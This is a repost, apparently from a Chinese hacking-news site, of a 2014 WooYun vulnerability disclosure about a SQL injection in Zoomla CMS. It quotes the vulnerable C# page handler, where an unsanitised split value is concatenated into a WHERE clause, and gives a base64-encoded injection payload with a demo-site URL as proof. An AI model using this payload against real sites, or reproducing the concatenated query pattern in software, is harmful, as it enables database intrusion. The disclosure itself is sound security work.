记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

逐浪CMS某处编码SQL注入漏洞

2014-08-04 20:45

地址

http://demo.zoomla.cn/3d/InsertContext.aspx





protected void Page_Load(object sender, EventArgs e)

{

if (base.Request.QueryString["type"] != null)

{

this.md.Caddtime = DateTime.Now;

this.md.Cadduser = this.user.GetLogin().UserName;

string s = base.Request.Form.ToString();

s = base.Server.UrlDecode(s);

try

{

s = BaseClass.FromBase64String(s); //base64转换

}

catch (Exception exception)

{

s = exception.ToString() + s;

}

if (s.IndexOf("$") > -1)

{

string[] strArray = s.Split(new char[] { '$' }, StringSplitOptions.RemoveEmptyEntries); //分割

if (base.Request.QueryString["type"].ToString() == "Suser")

{

DataTable table = this.bduser.Select_Where(" Dutype=1 and DuShow=" + strArray[1], " * ", ""); //数组第二部分没处理 存在注入

if (table.Rows.Count > 0)

{

this.md.Ctouid = DataConverter.CLng(table.Rows[0]["DUid"].ToString());

}

this.dt = this.bduser.Select_Where(" Duid=" + this.md.Ctouid, " * ", "");

if ((this.dt.Rows.Count > 0) && (this.mduser.Dislogin == 0))

{

this.mduser.Dmessage++;

}

}

else

{

this.md.Ctouid = DataConverter.CLng(strArray[1]);

this.dt = this.bduser.Select_Where(" Duid=" + this.md.Ctouid, " * ", "");

this.mduser.Dmessage++;

}

this.md.Ccontent = BaseClass.Htmlcode(strArray[0]);

this.md.ChatType = 0;

this.SetUserContext();

}

else

{

this.dt = this.bduser.Select_Where(" Duid=" + this.user.GetLogin().UserID, " * ", "");

this.md.Ccontent = BaseClass.Htmlcode(s);

this.md.ChatType = 1;

this.SetUserContext();

}

this.bd.GetInsert(this.md);

}

if (this.dt != null)

{

this.dt.Dispose();

}

}

漏洞证明:

访问

http://demo.zoomla.cn/3d/InsertContext.aspx?type=Suser





提交

YSQxIGFuZCAoc2VsZWN0IEBAdmVyc2lvbik+MCAtLQ==





这个是base64的值 原来的值是 a$1 and (select @@version)>0 --

$后面可自己构造 然后整个字符串转换为base64编码



597.png



修复方案:

对参数进行处理

知识来源: www.wooyun.org/bugs/wooyun-2014-060071

阅读:74058 | 评论:0 | 标签:注入 cms 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“逐浪CMS某处编码SQL注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云